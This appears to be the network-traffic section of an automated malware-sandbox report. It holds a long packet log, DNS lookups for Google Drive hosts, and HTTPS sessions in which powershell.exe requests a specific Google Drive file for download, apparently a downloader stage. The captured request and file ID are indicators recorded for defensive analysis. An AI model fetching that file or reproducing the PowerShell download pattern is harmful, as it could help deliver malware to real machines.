                  Oct 1, 2024 07:46:28.837007046 CEST44349708172.217.16.206192.168.2.8
                  Oct 1, 2024 07:46:28.837167978 CEST49708443192.168.2.8172.217.16.206
                  Oct 1, 2024 07:46:28.837181091 CEST44349708172.217.16.206192.168.2.8
                  Oct 1, 2024 07:46:28.837235928 CEST49708443192.168.2.8172.217.16.206
                  Oct 1, 2024 07:46:28.837413073 CEST49708443192.168.2.8172.217.16.206
                  Oct 1, 2024 07:46:28.837451935 CEST44349708172.217.16.206192.168.2.8
                  Oct 1, 2024 07:46:28.837629080 CEST44349708172.217.16.206192.168.2.8
                  Oct 1, 2024 07:46:28.837692976 CEST49708443192.168.2.8172.217.16.206
                  Oct 1, 2024 07:46:28.837721109 CEST49708443192.168.2.8172.217.16.206
                  Oct 1, 2024 07:46:28.850872040 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:28.850912094 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:28.851177931 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:28.851404905 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:28.851414919 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:29.512758970 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:29.513792992 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:29.517781973 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:29.517802954 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:29.518062115 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:29.518537045 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:29.518537045 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:29.559410095 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.630676031 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.630839109 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.630876064 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.630911112 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.630928040 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.630951881 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.635090113 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.635175943 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.635229111 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.635278940 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.635329962 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.635380983 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.635467052 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.635515928 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.635545969 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.635593891 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.635624886 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.635674953 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.635701895 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.635750055 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.635793924 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.635842085 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.636167049 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.636220932 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.636243105 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.636334896 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.636344910 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.636377096 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.636398077 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.636440992 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.636471987 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.636523008 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.637134075 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.637190104 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.637233973 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.637281895 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.637317896 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.637363911 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.637391090 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.637440920 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.637970924 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.638020992 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.638096094 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.638140917 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.638179064 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.638225079 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.638261080 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.638309956 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.638333082 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.638379097 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.638803005 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.638855934 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.638879061 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.638923883 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.639266014 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.639318943 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.639360905 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.639406919 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.639481068 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.639528036 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.639777899 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.639830112 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.640162945 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.640228987 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.640336990 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.640389919 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.640503883 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.640557051 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.640786886 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.640846014 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.640870094 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.640969038 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.640980959 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.641037941 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.641226053 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.641284943 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.641534090 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.641593933 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.641771078 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.641830921 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.641854048 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.641901016 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.644578934 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.644634962 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.644645929 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.644653082 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.644670963 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.644711971 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.644718885 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.644753933 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.644862890 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.644905090 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.645051003 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.645093918 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.645283937 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.645327091 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.645328045 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.645339966 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.645412922 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.645417929 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.645453930 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.646199942 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.646243095 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.646250963 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.646284103 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.646291971 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.646297932 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.646316051 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.646342993 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.646415949 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.646460056 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.646548033 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.646591902 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.646595001 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.646610022 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.646636009 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.646658897 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.646661997 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.646668911 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.646696091 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.646712065 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.646733046 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.646739006 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.646759987 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.646766901 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.646790981 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.646795988 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.646821976 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.646859884 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.646884918 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.646884918 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.693486929 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.693511963 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.693538904 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.693543911 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.693556070 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.693567991 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.693613052 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.693619013 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.693653107 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.703699112 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.703752041 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.703779936 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.703804970 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.703809023 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.703823090 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.703859091 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.703905106 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.703908920 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.703944921 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.708133936 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.708210945 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.708266020 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.708312988 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.708336115 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.708340883 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.708348036 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.708362103 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.708394051 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.708409071 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.708411932 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.708448887 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.717637062 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.717690945 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.717716932 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.717719078 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.717732906 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.717739105 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.717772007 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.717782974 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.717789888 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.717809916 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.717828035 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.722145081 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.722278118 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.722623110 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.722681046 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.722707987 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.722733974 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.722788095 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.722795963 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.722841978 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.731657028 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.731712103 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.731738091 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.731739044 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.731750011 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.731784105 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.731807947 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.731813908 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.731851101 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.735857010 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.735918045 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.735925913 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.735934973 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.735959053 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.735966921 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.735985994 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.735991955 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.736021996 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.736047983 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.736052036 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.736088991 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.739779949 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.739845037 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.739922047 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.739964008 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.739969969 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.739980936 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.740019083 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.740024090 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.740034103 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.740057945 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.740075111 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.747998953 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.748063087 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.748073101 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.748102903 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.748102903 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.748117924 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.748143911 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.748166084 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.748172045 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.748205900 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.748209953 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.748243093 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.752142906 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.752191067 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.752197027 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.752226114 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.752229929 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.752240896 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.752263069 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.752286911 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.752290010 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.752300024 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.752321959 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.752362967 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.759267092 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.759320021 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.759339094 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.759350061 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.759377956 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.759404898 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.759406090 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.759417057 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.759481907 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.759486914 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.759524107 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.762670994 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.762734890 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.762737036 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.762749910 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.762779951 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.762785912 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.762813091 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.762819052 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.762825966 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.762851954 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.762875080 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.779198885 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.779264927 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.779292107 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.779295921 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.779309988 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.779320955 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.779356003 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.779361010 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.779397011 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.779402018 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.779419899 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.779434919 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.779443979 CEST44349709142.250.184.193192.168.2.8
                  Oct 1, 2024 07:46:32.779452085 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.779464960 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.779481888 CEST49709443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:46:32.779481888 CEST49709443192.168.2.8142.250.184.193
                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                  Oct 1, 2024 07:45:54.471915960 CEST | 54511 | 53 | 192.168.2.8 | 1.1.1.1
                  Oct 1, 2024 07:45:54.478842020 CEST | 53 | 54511 | 1.1.1.1 | 192.168.2.8
                  Oct 1, 2024 07:45:55.518881083 CEST | 63461 | 53 | 192.168.2.8 | 1.1.1.1
                  Oct 1, 2024 07:45:55.525914907 CEST | 53 | 63461 | 1.1.1.1 | 192.168.2.8
                  Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                  Oct 1, 2024 07:45:54.471915960 CEST | 192.168.2.8 | 1.1.1.1 | 0x8af7 | Standard query (0) | drive.google.com | A (IP address) | IN (0x0001) | false
                  Oct 1, 2024 07:45:55.518881083 CEST | 192.168.2.8 | 1.1.1.1 | 0x5a48 | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false
                  Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                  Oct 1, 2024 07:45:54.478842020 CEST | 1.1.1.1 | 192.168.2.8 | 0x8af7 | No error (0) | drive.google.com | | 172.217.16.206 | A (IP address) | IN (0x0001) | false
                  Oct 1, 2024 07:45:55.525914907 CEST | 1.1.1.1 | 192.168.2.8 | 0x5a48 | No error (0) | drive.usercontent.google.com | | 142.250.184.193 | A (IP address) | IN (0x0001) | false
                  • drive.google.com
                  • drive.usercontent.google.com
                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  0 | 192.168.2.8 | 49705 | 172.217.16.206 | 443 | 7756 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Timestamp | Bytes transferred | Direction | Data
                  2024-10-01 05:45:55 UTC | 215 | OUT | GET /uc?export=download&id=1ZdybZY4WrMwYKbuTlGVANt9wXhqlWSBc HTTP/1.1
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                  Host: drive.google.com
                  Connection: Keep-Alive
                  2024-10-01 05:45:55 UTC | 1610 | IN | HTTP/1.1 303 See Other
                  Content-Type: application/binary
                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                  Pragma: no-cache
                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                  Date: Tue, 01 Oct 2024 05:45:55 GMT
                  Location: https://drive.usercontent.google.com/download?id=1ZdybZY4WrMwYKbuTlGVANt9wXhqlWSBc&export=download
                  Strict-Transport-Security: max-age=31536000
                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                  Cross-Origin-Opener-Policy: same-origin
                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                  Content-Security-Policy: script-src 'nonce-imlt5SbfKhMcPeKWUc4-Ww' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                  Server: ESF
                  Content-Length: 0
                  X-XSS-Protection: 0
                  X-Frame-Options: SAMEORIGIN
                  X-Content-Type-Options: nosniff
                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                  Connection: close


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  1 | 192.168.2.8 | 49706 | 142.250.184.193 | 443 | 7756 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Timestamp | Bytes transferred | Direction | Data
